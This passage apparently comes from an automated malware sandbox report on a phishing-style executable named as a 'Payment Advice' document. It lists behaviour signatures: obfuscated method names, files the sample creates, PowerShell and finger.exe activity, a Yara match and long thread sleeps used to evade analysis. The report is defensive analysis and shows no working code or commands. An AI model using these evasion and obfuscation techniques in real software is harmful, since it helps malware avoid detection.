                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, iNUCM9tY92HkOxV2AR.csHigh entropy of concatenated method names: 'FBHHKudUg0', 'iY7HO3bKmO', 'kfbHH3xIOW', 'nqQHrVRgJ3', 'V9rHlRbo17', 'ckVHqmlFWx', 'Dispose', 'Ma5WaHsymx', 'RgoWgEjAXQ', 'gDuWwbqFFS'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, YB4U4Uypy84m9B9S7g.csHigh entropy of concatenated method names: 'ToString', 'bHfN64AvXQ', 'QbjNV73L4G', 'AGJNoJ47wE', 'VZwNmdRuHF', 'vpVNdB2OSO', 'fkUNQrbygt', 'eQ7NbFGlmE', 'vTGNYO6h9q', 'zHMNcF4AFS'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, sb5XVGprnYjbJ1UAnT.csHigh entropy of concatenated method names: 'eAyg85iki4', 'sOKgJX4WoP', 'cQdgylTmoI', 'KXFg1s828M', 'srWgCIqLUg', 'OaNgvhMQGt', 'fnKgtTax8w', 'Pcng7i1Ee0', 'R4Rg9c53le', 'mwwgfQFl6O'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, DR81CAcRy0W9DSRI7B.csHigh entropy of concatenated method names: 'tRfRP284Ga', 'CneR34Y3dv', 'sYHR2YVaKJ', 'F9IRZVsvVO', 'iLFRI1bH9S', 'K5NRGUN6rs', 'ImDRkgAMcm', 'wgQRp06phu', 'IPZR4xHeYN', 'HZfRTrBjIw'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, JBeYd0FEn4ooKA4xnY.csHigh entropy of concatenated method names: 'KyY5DNputn', 'PDb5gKr4vZ', 'rkl5UR4ckR', 'tgh5Rs7vDW', 'sCS5i9E8gm', 'zxTUC5Ughj', 'ejqUv4WBp3', 'gNuUtY2Sy8', 'z5RU7mgAwU', 'laTU9qyLbJ'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, R66anNz2q1P8pFtND6.csHigh entropy of concatenated method names: 'kN4XGqECNF', 'UNNXpNvLVY', 'bhfX4MqfDA', 'Ag6XF0k43t', 'CssXVaZjLF', 'GyiXmsVK3t', 'sEwXdHr8kE', 'xYWXqrnGDe', 'ABEXPAIqsn', 'xGrX3LBdA4'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, bUtdjvehlvvWYiu3IN2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KkuX6fSwtF', 'NI4XMMKqFg', 'VrhXAIwhAa', 'wMjX89i1Mm', 'AG5XJheTKA', 'MQuXyauSoe', 'LVJX1dL5Zs'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, IoviSa8uwJLlOQrTFw.csHigh entropy of concatenated method names: 'x49KjyXhgk', 'fXDKMxftiu', 'LtAK8KIqhb', 'x7SKJXn231', 'TiTKVTOxy8', 'vmFKo4dj14', 'QsFKmpJx1a', 'CPgKdOn8op', 'wT3KQqvNyw', 'JBBKbvRrM7'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, UOZiJHEZURY3nGWcFY.csHigh entropy of concatenated method names: 'eOXeRb5XVG', 'tnYeijbJ1U', 'KNHeLVbjTw', 'Tg9esvS7Mj', 'gfEeKoUdBe', 'Ld0eNEn4oo', 'M0U8aXx9kCJApigKxd', 'AYxYJU46PdGWr9xhCg', 'XjVee7AXCE', 'mvxe0AMNgw'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, JyrsQCxIWGHxFgHFUJ.csHigh entropy of concatenated method names: 'nxL2oFu7Q', 'MscZ9gVvG', 'ApOGO0a2b', 'wFAkOn3EF', 'cOA4pVqBh', 'qGsTYureu', 'qolAwJgvu01AFepIim', 'vtPxVSjOgWBvpXbj8l', 'BO5pyIwsDjy5c7Jrj6', 'ftDWq9T0S'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, fdTTD6gFhr5JJ2rk1d.csHigh entropy of concatenated method names: 'Dispose', 'zHke9OxV2A', 'iY8xVjhG0o', 'XoXjC9Q66u', 'jVeef48fyS', 'yPLezNnuu1', 'ProcessDialogKey', 'dGmxhD6meX', 'WmTxeGI8LT', 'd1CxxFuJGo'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, l7MjAxTdkZDkNgfEoU.csHigh entropy of concatenated method names: 'nNdUIYBJmA', 'DR1UkGlVdy', 'QhewobwYuV', 'WaMwm9Ua1N', 'y9mwdtJRdE', 'HOiwQ7CctW', 'a7QwbMBRqF', 'qQUwY2WIK2', 'OyjwcanUmq', 'SrUwjCeaMR'
                Source: 0.2.Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe.3886830.1.raw.unpack, XXx3ffeEulv1336Gfe4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OKWnHFw8bY', 'W7RnXyfjJP', 'j6RnrPobXJ', 'oocnnBMatK', 'DQDnlycWwU', 'wsMnBQJsQg', 'uHRnqN4sF1'
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile created: \payment advice - advice refa2dgov46mcnu -usd priority payment.exe
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile created: \payment advice - advice refa2dgov46mcnu -usd priority payment.exe
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile created: \payment advice - advice refa2dgov46mcnu -usd priority payment.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeFile created: \payment advice - advice refa2dgov46mcnu -usd priority payment.exeJump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe PID: 1740, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\finger.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 47B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 7790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 8790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeMemory allocated: 9790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeCode function: 4_2_016E096E rdtsc 4_2_016E096E
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6397Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 515Jump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\finger.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe TID: 4248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
